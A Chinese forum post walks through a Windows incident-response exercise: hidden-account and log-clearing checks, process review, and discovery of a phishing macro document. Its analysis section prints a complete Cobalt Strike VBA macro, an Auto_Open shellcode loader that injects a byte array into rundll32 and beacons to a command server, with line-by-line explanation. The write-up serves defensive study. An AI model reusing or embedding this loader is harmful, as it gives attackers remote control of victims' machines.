论坛首页 > 技术文章投稿区 > 技术文章

菜狗windows应急响应上

F0re4t   ·   发表于 2023-01-09 16:48:41   ·   技术文章

入侵排查

1.账号安全

  1. net user

查看是否有异常用户

未发现异常,那么接下来考虑隐藏账户或者克隆账号

发现隐藏账号

  1. wmic useraccount get name,sid

发现一个隐藏账号attack,还好不是克隆,不然还得翻注册表

检查异常网络连接-无

  1. netstat -ano

全是开启监听,并无交互。

暂时放一边,从别的地方入手看看。

日志分析

排查是否有清除过日志

手动常规清除-无

先查看是否有1102清除日志的记录产生

使用msf清除指定日志-无

使用msf清除指定日志的话,会在系统日志留下102类型的日志

使用cs清除日志-无

无日志操作记录,但是日志服务会关闭,需要手动重启。这里并没有。

修改注册表清除-无

这时需要打开注册表排查这个路径下\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control是否多了MiniNT选项。


得出结论:

1.入侵者未清除日志

2.使用msf清除所有日志,这时没有操作记录留下,日志也不会关闭。

待分析后确认猜想。

创建用户日志分析

既然发现了隐藏账户attck$,那么首先来分析创建时间,初步判断入侵时间。

创建attck$安z账户时会产生4720-创建用户日志和4722-启用用户日志两种日志。

然而令我很失望的是,这两种日志都没有结果,那么很大概率可以判断是使用msf清除所有日志或者我不了解的手段清除了痕迹。既然这样日志上可能分析不出来什么东西了,换一个思路

进程分析

查看是否有可疑的进程

  1. wmic process get commandline,executablepath,executionstate,name,priority,processid,parentprocessid /formate:list

很多,复制下来慢慢看

  1. CommandLine=C:\Windows\system32\svchost.exe -k DcomLaunch
  2. ExecutablePath=C:\Windows\system32\svchost.exe
  3. ExecutionState=
  4. Name=svchost.exe
  5. ParentProcessId=608
  6. Priority=8
  7. ProcessId=804
  10. CommandLine="C:\Program Files\VMware\VMware Tools\vmacthlp.exe"
  11. ExecutablePath=C:\Program Files\VMware\VMware Tools\vmacthlp.exe
  12. ExecutionState=
  13. Name=vmacthlp.exe
  14. ParentProcessId=608
  15. Priority=8
  16. ProcessId=848
  19. CommandLine=C:\Windows\system32\svchost.exe -k rpcss
  20. ExecutablePath=C:\Windows\system32\svchost.exe
  21. ExecutionState=
  22. Name=svchost.exe
  23. ParentProcessId=608
  24. Priority=8
  25. ProcessId=880
  28. CommandLine=C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  29. ExecutablePath=C:\Windows\System32\svchost.exe
  30. ExecutionState=
  31. Name=svchost.exe
  32. ParentProcessId=608
  33. Priority=8
  34. ProcessId=916
  37. CommandLine=C:\Windows\system32\svchost.exe -k GPSvcGroup
  38. ExecutablePath=C:\Windows\system32\svchost.exe
  39. ExecutionState=
  40. Name=svchost.exe
  41. ParentProcessId=608
  42. Priority=8
  43. ProcessId=1004
  46. CommandLine=C:\Windows\system32\svchost.exe -k netsvcs
  47. ExecutablePath=C:\Windows\system32\svchost.exe
  48. ExecutionState=
  49. Name=svchost.exe
  50. ParentProcessId=608
  51. Priority=8
  52. ProcessId=220
  55. CommandLine=C:\Windows\system32\SLsvc.exe
  56. ExecutablePath=C:\Windows\system32\SLsvc.exe
  57. ExecutionState=
  58. Name=SLsvc.exe
  59. ParentProcessId=608
  60. Priority=8
  61. ProcessId=304
  64. CommandLine=C:\Windows\system32\svchost.exe -k LocalService
  65. ExecutablePath=C:\Windows\system32\svchost.exe
  66. ExecutionState=
  67. Name=svchost.exe
  68. ParentProcessId=608
  69. Priority=8
  70. ProcessId=448
  73. CommandLine=C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  74. ExecutablePath=C:\Windows\System32\svchost.exe
  75. ExecutionState=
  76. Name=svchost.exe
  77. ParentProcessId=608
  78. Priority=8
  79. ProcessId=736
  82. CommandLine=C:\Windows\system32\svchost.exe -k NetworkService
  83. ExecutablePath=C:\Windows\system32\svchost.exe
  84. ExecutionState=
  85. Name=svchost.exe
  86. ParentProcessId=608
  87. Priority=8
  88. ProcessId=344
  91. CommandLine=C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  92. ExecutablePath=C:\Windows\system32\svchost.exe
  93. ExecutionState=
  94. Name=svchost.exe
  95. ParentProcessId=608
  96. Priority=8
  97. ProcessId=1132
  100. CommandLine=taskeng.exe {C1AD95CB-CEA5-43D4-8072-C2E0817CD62D}
  101. ExecutablePath=C:\Windows\system32\taskeng.exe
  102. ExecutionState=
  103. Name=taskeng.exe
  104. ParentProcessId=220
  105. Priority=6
  106. ProcessId=1140
  109. CommandLine=C:\Windows\System32\spoolsv.exe
  110. ExecutablePath=C:\Windows\System32\spoolsv.exe
  111. ExecutionState=
  112. Name=spoolsv.exe
  113. ParentProcessId=608
  114. Priority=8
  115. ProcessId=1316
  118. CommandLine="C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEDICT
  119. UPDATE.EXE"
  120. ExecutablePath=C:\Program Files\Common Files\Microsoft Shared\IME14\SHARED\IMEDI
  121. CTUPDATE.EXE
  122. ExecutionState=
  123. Name=IMEDICTUPDATE.EXE
  124. ParentProcessId=608
  125. Priority=8
  126. ProcessId=1368
  129. CommandLine=taskeng.exe {36687750-3988-46D1-BC9B-560C2F7A36BA}
  130. ExecutablePath=C:\Windows\system32\taskeng.exe
  131. ExecutionState=
  132. Name=taskeng.exe
  133. ParentProcessId=220
  134. Priority=8
  135. ProcessId=1604
  138. CommandLine="C:\Windows\system32\Dwm.exe"
  139. ExecutablePath=C:\Windows\system32\Dwm.exe
  140. ExecutionState=
  141. Name=dwm.exe
  142. ParentProcessId=736
  143. Priority=8
  144. ProcessId=1652
  147. CommandLine=C:\Windows\Explorer.EXE
  148. ExecutablePath=C:\Windows\Explorer.EXE
  149. ExecutionState=
  150. Name=explorer.exe
  151. ParentProcessId=1620
  152. Priority=8
  153. ProcessId=1792
  156. CommandLine="C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
  157. ExecutablePath=C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
  158. ExecutionState=
  159. Name=vmtoolsd.exe
  160. ParentProcessId=1792
  161. Priority=8
  162. ProcessId=1912
  165. CommandLine=C:\Windows\system32\conime.exe
  166. ExecutablePath=C:\Windows\system32\conime.exe
  167. ExecutionState=
  168. Name=conime.exe
  169. ParentProcessId=1780
  170. Priority=8
  171. ProcessId=1804
  174. CommandLine=C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
  175. ExecutablePath=C:\Windows\system32\svchost.exe
  176. ExecutionState=
  177. Name=svchost.exe
  178. ParentProcessId=608
  179. Priority=8
  180. ProcessId=1860
  183. CommandLine=C:\Windows\system32\svchost.exe -k regsvc
  184. ExecutablePath=C:\Windows\system32\svchost.exe
  185. ExecutionState=
  186. Name=svchost.exe
  187. ParentProcessId=608
  188. Priority=8
  189. ProcessId=1928
  192. CommandLine="C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.ex
  193. e"
  194. ExecutablePath=C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.
  195. exe
  196. ExecutionState=
  197. Name=VGAuthService.exe
  198. ParentProcessId=608
  199. Priority=8
  200. ProcessId=1964
  203. CommandLine="C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
  204. ExecutablePath=C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
  205. ExecutionState=
  206. Name=vmtoolsd.exe
  207. ParentProcessId=608
  208. Priority=13
  209. ProcessId=1572
  212. CommandLine=C:\Windows\System32\svchost.exe -k WerSvcGroup
  213. ExecutablePath=C:\Windows\System32\svchost.exe
  214. ExecutionState=
  215. Name=svchost.exe
  216. ParentProcessId=608
  217. Priority=8
  218. ProcessId=2008
  221. CommandLine="C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtec
  222. tionPlatform\OSPPSVC.EXE"
  223. ExecutablePath=C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProt
  224. ectionPlatform\OSPPSVC.EXE
  225. ExecutionState=
  226. Name=OSPPSVC.EXE
  227. ParentProcessId=608
  228. Priority=8
  229. ProcessId=1580
  232. CommandLine=C:\Windows\system32\wbem\wmiprvse.exe
  233. ExecutablePath=C:\Windows\system32\wbem\wmiprvse.exe
  234. ExecutionState=
  235. Name=WmiPrvSE.exe
  236. ParentProcessId=804
  237. Priority=8
  238. ProcessId=2172
  241. CommandLine=C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-
  242. 00805FC79235}
  243. ExecutablePath=C:\Windows\system32\dllhost.exe
  244. ExecutionState=
  245. Name=dllhost.exe
  246. ParentProcessId=608
  247. Priority=8
  248. ProcessId=2436
  251. CommandLine=C:\Windows\System32\msdtc.exe
  252. ExecutablePath=C:\Windows\System32\msdtc.exe
  253. ExecutionState=
  254. Name=msdtc.exe
  255. ParentProcessId=608
  256. Priority=8
  257. ProcessId=2548
  260. CommandLine="C:\Windows\system32\wuauclt.exe"
  261. ExecutablePath=C:\Windows\system32\wuauclt.exe
  262. ExecutionState=
  263. Name=wuauclt.exe
  264. ParentProcessId=220
  265. Priority=8
  266. ProcessId=2632
  269. CommandLine="C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"
  270. ExecutablePath=C:\Windows\system32\mmc.exe
  271. ExecutionState=
  272. Name=mmc.exe
  273. ParentProcessId=1612
  274. Priority=8
  275. ProcessId=2740
  278. CommandLine="C:\Windows\system32\cmd.exe"
  279. ExecutablePath=C:\Windows\system32\cmd.exe
  280. ExecutionState=
  281. Name=cmd.exe
  282. ParentProcessId=1792
  283. Priority=8
  284. ProcessId=2212
  287. CommandLine=wmic  process get commandline,executablepath,executionstate,name,pri
  288. ority,processid,parentprocessid /format:list
  289. ExecutablePath=C:\Windows\System32\Wbem\WMIC.exe
  290. ExecutionState=
  291. Name=WMIC.exe
  292. ParentProcessId=2212
  293. Priority=8
  294. ProcessId=2168
  299. C:\Users\Administrator>a

这你妹的我拿眼睛怎么看得出来东西

咋办呢,手工整不动了,上工具!

传入procexp

好家伙

思维固化!!!!

应急思维过于固化,想着上来按照经验套路走,导致浪费了很多时间。

就在我走头无路之时发现??桌面已经有两个文件了?!

而且别人提示的这么明显,

第一:启用了宏的文档

第二:Foxmail

这不就是明摆着告诉你邮件钓鱼+宏病毒上线了嘛。

真的没有比你再嚣张的黑客也没有比我再蠢的应急工程师了。。。。" class="reference-link">真的没有比你再嚣张的黑客也没有比我再蠢的应急工程师了。。。。

那么初步确定,钓鱼邮件+CS宏病毒上线。

当我点击了带有cs宏病毒的文档后再次查看连接

依旧没有发现心跳包,不知道是因为时间太久被放弃了还是什么原因。

恶意样本分析

查看宏病毒

  1. Private Type PROCESS_INFORMATION
  2.     hProcess As Long
  3.     hThread As Long
  4.     dwProcessId As Long
  5.     dwThreadId As Long
  6. End Type
  8. Private Type STARTUPINFO
  9.     cb As Long
  10.     lpReserved As String
  11.     lpDesktop As String
  12.     lpTitle As String
  13.     dwX As Long
  14.     dwY As Long
  15.     dwXSize As Long
  16.     dwYSize As Long
  17.     dwXCountChars As Long
  18.     dwYCountChars As Long
  19.     dwFillAttribute As Long
  20.     dwFlags As Long
  21.     wShowWindow As Integer
  22.     cbReserved2 As Integer
  23.     lpReserved2 As Long
  24.     hStdInput As Long
  25.     hStdOutput As Long
  26.     hStdError As Long
  27. End Type
  29. #If VBA7 Then
  30.     Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
  31.     Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
  32.     Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
  33.     Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
  34. #Else
  35.     Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
  36.     Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
  37.     Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
  38.     Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
  39. #End If
  41. Sub Auto_Open()
  42.     Dim myByte As Long, myArray As Variant, offset As Long
  43.     Dim pInfo As PROCESS_INFORMATION
  44.     Dim sInfo As STARTUPINFO
  45.     Dim sNull As String
  46.     Dim sProc As String
  48. #If VBA7 Then
  49.     Dim rwxpage As LongPtr, res As LongPtr
  50. #Else
  51.     Dim rwxpage As Long, res As Long
  52. #End If
  53.     myArray = Array(-4, -24, -119, 0, 0, 0, 96, -119, -27, 49, -46, 100, -117, 82, 48, -117, 82, 12, -117, 82, 20, -117, 114, 40, 15, -73, 74, 38, 49, -1, 49, -64, -84, 60, 97, 124, 2, 44, 32, -63, -49, _
  54. 13, 1, -57, -30, -16, 82, 87, -117, 82, 16, -117, 66, 60, 1, -48, -117, 64, 120, -123, -64, 116, 74, 1, -48, 80, -117, 72, 24, -117, 88, 32, 1, -45, -29, 60, 73, -117, 52, -117, 1, _
  55. -42, 49, -1, 49, -64, -84, -63, -49, 13, 1, -57, 56, -32, 117, -12, 3, 125, -8, 59, 125, 36, 117, -30, 88, -117, 88, 36, 1, -45, 102, -117, 12, 75, -117, 88, 28, 1, -45, -117, 4, _
  56. -117, 1, -48, -119, 68, 36, 36, 91, 91, 97, 89, 90, 81, -1, -32, 88, 95, 90, -117, 18, -21, -122, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, -1, _
  57. -43, 49, -1, 87, 87, 87, 87, 87, 104, 58, 86, 121, -89, -1, -43, -23, -124, 0, 0, 0, 91, 49, -55, 81, 81, 106, 3, 81, 81, 104, 64, 31, 0, 0, 83, 80, 104, 87, -119, -97, _
  58. -58, -1, -43, -21, 112, 91, 49, -46, 82, 104, 0, 2, 64, -124, 82, 82, 82, 83, 82, 80, 104, -21, 85, 46, 59, -1, -43, -119, -58, -125, -61, 80, 49, -1, 87, 87, 106, -1, 83, 86, _
  59. 104, 45, 6, 24, 123, -1, -43, -123, -64, 15, -124, -61, 1, 0, 0, 49, -1, -123, -10, 116, 4, -119, -7, -21, 9, 104, -86, -59, -30, 93, -1, -43, -119, -63, 104, 69, 33, 94, 49, -1, _
  60. -43, 49, -1, 87, 106, 7, 81, 86, 80, 104, -73, 87, -32, 11, -1, -43, -65, 0, 47, 0, 0, 57, -57, 116, -73, 49, -1, -23, -111, 1, 0, 0, -23, -55, 1, 0, 0, -24, -117, -1, _
  61. -1, -1, 47, 57, 69, 117, 105, 0, 50, -17, 48, -30, -20, 49, -42, 91, -113, -15, -38, 25, 103, -98, 68, -2, -55, -82, -23, -73, 0, 122, -72, 48, 65, 102, -105, -53, -89, 61, -64, -25, _
  62. -66, -15, -78, 2, 60, 114, -62, 84, -93, 39, 111, -93, 15, -51, 36, -64, 92, 74, -18, 50, 48, -90, -115, -28, -28, -24, -57, -22, -59, 15, -104, 48, -105, -69, -34, -14, -108, -36, -118, -102, _
  63. -78, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 99, 111, 109, 112, 97, 116, 105, 98, 108, 101, 59, 32, 77, _
  64. 83, 73, 69, 32, 57, 46, 48, 59, 32, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 54, 46, 49, 59, 32, 87, 79, 87, 54, 52, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, _
  65. 53, 46, 48, 59, 32, 66, 79, 73, 69, 57, 59, 69, 78, 85, 83, 83, 69, 77, 41, 13, 10, 0, -31, 98, -128, 117, -15, -11, 37, 50, -90, -79, 12, -110, 87, -11, 72, 29, -15, 99, _
  66. -43, -2, -75, 115, -57, -116, 54, -15, -4, 87, -87, 115, 7, -75, 97, -90, 77, -97, 94, 111, -60, 116, -57, -81, 24, -52, -128, 66, 80, 55, -33, 2, 81, 94, 105, 7, -26, -55, 122, -70, _
  67. -40, -47, -47, 81, -121, 73, -18, 53, 1, -13, 120, -76, 28, -73, 100, -12, 85, 77, 66, 16, 91, -51, 17, -70, 115, -10, -24, -32, -113, -38, -119, 108, -46, 116, -89, -109, -93, 61, -118, 51, _
  68. -19, -85, 27, -101, -47, -123, -85, -78, -76, -81, -34, -71, 127, 123, -66, -38, -34, 70, -101, 102, 61, -47, -27, -29, -67, 112, -4, -58, 86, -21, 95, 53, 10, 75, 1, 67, 111, 107, -11, -108, _
  69. 5, 57, -15, -47, -58, -104, 29, -111, -13, 35, 106, -67, -47, -36, -36, -20, -26, 119, -17, -87, -23, 5, -24, 79, -74, -70, 65, 85, 65, -88, 22, -44, -9, 33, -21, 60, 52, 64, -82, 85, _
  70. 26, 23, 90, 69, 15, 53, -85, -70, -108, -122, 60, 12, 10, 10, -55, 89, -46, 109, -32, -53, -76, -13, 52, -96, -44, 0, 104, -16, -75, -94, 86, -1, -43, 106, 64, 104, 0, 16, 0, 0, _
  71. 104, 0, 0, 64, 0, 87, 104, 88, -92, 83, -27, -1, -43, -109, -71, 0, 0, 0, 0, 1, -39, 81, 83, -119, -25, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, -106, -119, -30, -1, -43, _
  72. -123, -64, 116, -58, -117, 7, 1, -61, -123, -64, 117, -27, 88, -61, -24, -87, -3, -1, -1, 49, 48, 46, 50, 48, 46, 50, 52, 46, 49, 56, 0, 18, 52, 86, 120)
  73.     If Len(Environ("ProgramW6432")) > 0 Then
  74.         sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
  75.     Else
  76.         sProc = Environ("windir") & "\\System32\\rundll32.exe"
  77.     End If
  79.     res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
  81.     rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
  82.     For offset = LBound(myArray) To UBound(myArray)
  83.         myByte = myArray(offset)
  84.         res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
  85.     Next offset
  86.     res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
  87. End Sub

可以看到这是一段简单的cs直接生成VBA的宏病毒,并未使用加密混淆等免杀手段。

简单分析

  1. //调用windows的api:KERNEL32.dll做了四个事情
  2. 1.//CreateRemoteThread创建线程
  3. Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
  5.     2.//VirtualAllocEx申请内存,类似c++的virtualalloc或者virtualprotect
  6.  Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
  8.         3.//WriteProcessMemory写进程内存
  9. Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
  11.             4.//创建进程CreateProcessA
  12. Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
  14. //之后就是往内存中放入shellcode,shellcode就是myarray里面那一坨
  15.                 简单分析:
  16. //首先使用 if 语句来确定系统是 32 位还是 64 位。 如果系统是 64 位,则将变量 sProc 设置为 rundll32.exe 的位置,该位置为 "windir"(Windows 目录)加上 "\SysWOW64\rundll32.exe";如果系统是 32 位,则将变量 sProc 设置为 "windir" 加上 "\System32\rundll32.exe"。
  17. If Len(Environ("ProgramW6432")) > 0 Then
  18.         sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
  19.     Else
  20.         sProc = Environ("windir") & "\\System32\\rundll32.exe"
  21.     End If
  23. //接下来,调用 RunStuff 函数来启动 rundll32.exe 进程。 该函数的参数包括要运行的进程的路径(在此情况下为 sProc)以及其他选项,例如启动方式(ByVal 0&)和窗口状态(ByVal 1&)。
  24. res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
  26. //然后,调用 AllocStuff 函数分配进程地址空间中的内存。 该函数的参数包括要分配内存的进程(pInfo.hProcess),要分配的内存数(UBound(myArray)),内存保护(&H1000,表示可读写)和内存分配类型(&H40,表示内存可执行)。
  27. rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)                    
  29. //然后,使用 for 循环遍历 myArray 数组,并使用 WriteStuff 函数将数组的每个元素写入分配的内存。 WriteStuff 函数的参数包括要写入的进程(pInfo.hProcess),内存地址(rwxpage + offset),要写入的数据(myByte)和数据大小(1)。
  30.  For offset = LBound(myArray) To UBound(myArray)
  31.         myByte = myArray(offset)
  32.         res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)

总的来说宏病毒也是shellcodeloader的一种,和c++写shellcodeloader的那一套很像,virtualalloc、RTLmove/copymemory、CreateThread这样。

思路都差不多就是要先搞到一段可读可写可执行的内存,把你的shellcode丢进去,创建线程,完事。

可以看到一点开文档,任务管理器中就会看到被启用的rundll32

宏代码中并没有其他的dll注入,写定时任务等操作,仅是起到了一个简单shellcodeloader的作用,用于上线攻击者的cs服务器。至此样本分析结束。

### ### 接下来的常规操作就是删除钓鱼文档,删除创建的隐藏用户,排查是否有其他后门就结案了。

但是总觉得还有太多没有理清让我疑惑的地方了

1.cs上线之后攻击者真的没有使用cs对其进行持久化操作吗?

2.攻击者的入侵痕迹真的是我所想的钓鱼邮件+宏病毒上线cs这么简单吗?

为什么收件人是已经是attack$?是否是攻击者通过别的方式入侵,创建attack这个账户,然后自己下载的邮箱接受钓鱼邮件上线的cs呢?

3.既然创建了隐藏账户,为什么没有留下4720和4722日志,如果是cs清除的日志,为什么日志服务没有异常关闭?

敬请收看windows应急下(如果本菜鸡还能发现点啥踪迹分析出来的话)

用户名金币积分时间理由
Track-聂风 100.00 0 2023-03-08 15:03:58 加油

打赏我,让我更有动力~

0 条回复   |  直到 2023-1-9 | 960 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.